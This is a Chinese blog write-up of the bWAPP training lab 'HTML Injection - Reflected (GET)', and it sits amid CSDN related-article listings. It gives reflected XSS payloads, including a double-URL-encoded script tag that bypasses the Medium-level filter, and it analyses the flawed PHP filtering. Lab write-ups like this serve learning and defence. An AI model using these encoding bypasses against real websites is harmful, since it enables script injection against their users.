bWAPP靶场之HTML Injection(GET)

最新推荐文章于 2023-09-08 17:48:32 发布
最新推荐文章于 2023-09-08 17:48:32 发布
阅读量437 收藏 1
点赞数
分类专栏: # 靶场通关
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/syy0201/article/details/100152066
版权

0x00 前言

最近想把bwapp通关~~冲鸭!

0x01 测试过程

先随便输入一下,发现输入的名字会输出到页面上
在这里插入图片描述
1.Low
由于会输出输入的名字,我们先尝试一下能不能弹框,OK~~

payload:?firstname=<script>alert(1)</script>&lastname=ruanruan&form=submit

在这里插入图片描述
再尝试引入外链

payload:?firstname=quanquan&lastname=ruanruan&form=submit

在这里插入图片描述
2.Medium
使用Low等级的两个payload,发现都没执行
在这里插入图片描述
在这里插入图片描述
可能过滤替换了一些字符
分析源码可以使用urlencode绕过,由于是在浏览器提交payload,浏览器会对url进行一次解码,所以我们需要对payload进行两次urlencode。payload:

?firstname=%253Cscript%253Ealert%25281%2529%253C%252fscript%253E&lastname=ruanruan&form=submit

在这里插入图片描述
payload:

?firstname=%253Ca%2520href%253D%2522https%253A%252f%252fblog.csdn.net%252fsyy0201%2522%253Equanquan%253C%252fa%253E&lastname=ruanruan&form=submit

在这里插入图片描述
3.High

0x02 源码分析

1.Low
在这里插入图片描述
无任何过滤,直接输出。
2.Medium
关键代码:functions_external.php
在这里插入图片描述
从第92、93行可以知道,该函数使用了str_replace()将<>转换成HTML实体字符。但是在输出的时候又对输出进行了url解码。那么我们就可以利用url编码绕过str_replace的检查。
3.High
在这里插入图片描述
使用了htmlentities()函数将输入转换为 HTML 实体。emmm绕不过

0nc3
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
html %3ca%3e 动态效果,bWAPP练习--injection篇之HTML Injection - Reflected (GET)
weixin_30921373的博客
06-03 555
什么是Injectioninjection,中文意思就是注入的意思,常见的注入漏洞就是SQL注入啦,是现在应用最广泛,杀伤力很大的漏洞。什么是HTML injection?有交互才会产生漏洞,无论交互是怎么进行的。交互就是网页有对后台数据库的读取或前端的动态效果。HTML文件并不是像大家想的那样没有任何交互,在HTML文件里还是会用到一些JavaScript来完成自己需要的一些动态效果,例如,地...
1.bWAPP HTML Injection (HTML注入)
自强不息
01-21 546
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
bWAPP HTML Injection (HTML注入)
angry_program的博客
02-24 1737
前言 bwapp靶场每一种类型都分为3种等级: Low, Medium, High 这边我就按照类型归类写, 方便查阅。 话不多说, 直接lu靶场 0x01 HTML injection Reflected GET 分析网站: Low Low等级没有任何防护, 直接注入即可: Medium 在Medium等级中, 继续进行注入的话, 会发现&lt...
bWAPP靶场实战
Kevin's Blog
05-15 2890
文章目录一、靶场介绍二、靶场搭建2.1 安装类型2.2 独立安装三、漏洞实战SSRF远程文件包含端口扫描 一、靶场介绍   集成了超过100余个网络漏洞,php web漏洞靶场,能够调制漏洞难度等级(低->中->高)。 二、靶场搭建 下载:https://sourceforge.net/projects/bwapp/ 2.1 安装类型 搭建类型有两种:(虚拟机版本可测试测漏洞类型更多,比如破壳、心脏滴血) 独立安装(部署到apache + php +mysql环境下) 虚拟机安装(bee
bWAPP靶场搭建——直接使用虚拟机镜像导入配置
CoffeMilk的博客
12-27 2778
bWAPP是一款非常好用的免费的、开源漏洞演示学习平台;它有100多个网络错误!且它涵盖了所有已知的主要web漏洞,包括OWASP Top 10项目的所有风险。bWAPP是一个使用MySQL数据库的PHP应用程序;它可以通过Apache/IIS和MySQL托管在Linux/Windows上。WAMP或XAMPP支持它。也可以下载bee-box镜像(即bee-box镜像是一个预先安装了bWAPP靶场的定制虚拟机环境,开箱即用,十分方便)。
dvwa靶场通关之sql injection
07-19
dvwa靶场通关之sql injection
php之md5类型靶场.zip
最新发布
01-14
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
E049-论坛漏洞分析及利用-针对bwapp进行web渗透测试的探索.pdf
12-02
E049-论坛漏洞分析及利用-针对bwapp进行web渗透测试的探索
靶场系列之DC-1.md
07-26
靶场系列之DC-1.md
bwapp靶场XSS通关教程
2301_77315080的博客
09-08 256
lowalert("152");alert("152");进行实体引用<img src=0 onerror="alert(1)">
bwapp官方最新版本
03-20
bwapp官方最新版本
国内外黑客居然都在这些地方聚集
学习交流群:921427443
05-29 4695
1.track黑客导航 导航Track黑客导航 黑客导航,含有众多网安一行的官方网站及平台 无论你是老鸟还是萌新,都可以找得到对应适合的文章! 2.封神台靶场 封神台 - 掌控安全在线演练靶场,是一个在线黑客攻防演练平台。 在线练习靶场,是一个在线黑客攻防演练平台! 在成长的道路上怎么能缺少打怪刷级的乐趣呢! 但是市面上的网站漏洞组成复杂,而且会有法律风险,想要技术,封神台靶场是一个好的选择 3.黑客社区 Track 安全社区 - 掌控安全在线教育 Track_黑客_社区-追随黑客
sql注入靶场安装/POST型注入基础/一看就会
ChenD的学习笔记
10-05 796
SQL注入(二)post型注入方法
一次简单的html injection导致的Gmail 0day[完全修正版]
瞎几把学
08-03 7966
一次简单的html injection导致的Gmail 0day[完全修正版]这个漏洞在国庆前就已经发现,后来国庆回来发现google改版了,这个漏洞就被google意外修复了,就没有发布漏洞细节,但是最近发现google再次改版就又改回来了,正好我上次提到html injection(http://www.loveshell.net/blog/blogview.asp?logID=246),
bwapp medium writeup
公众号shadow sock7
06-15 4230
HTML injection(XSS)set security level as low很简单,正常的就可以绕过http://192.168.170.130/bWAPP/htmli_get.php?firstname=%25%33%63script%25%33%65alert(/XSS/)%25%33%63/script%25%33%65&lastname=%25%33%63script%25%33
bwapp靶场笔记 -SQL注入篇
m0_52149675的博客
10-30 1551
​启动靶场
Docker搭建BWAPP靶场
KHOST的博客
03-23 3349
buggy web Application 这是一个集成了各种常见漏洞和最新漏洞的开源Web应用程序,目的是帮助网络安全爱好者、开发人员和学生发现并防止网络漏洞。包含了超过100种漏洞,涵盖了所有主要的已知Web漏洞,包括OWASP Top10安全风险,最重要的是已经包含了OpenSSL和ShellShock漏洞。 通过Docker hub搭建为了大家方便使用,已经push到了docker h...
win10 bwapp靶场搭建
07-25
为了在Windows 10上搭建bwapp靶场,你需要进行以下步骤: 1. 下载并安装适用于Windows的XAMPP。你可以从 Apache Friends 的官方网站(https://www.apachefriends.org/index.html)下载最新版本。 2. 安装完成后,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值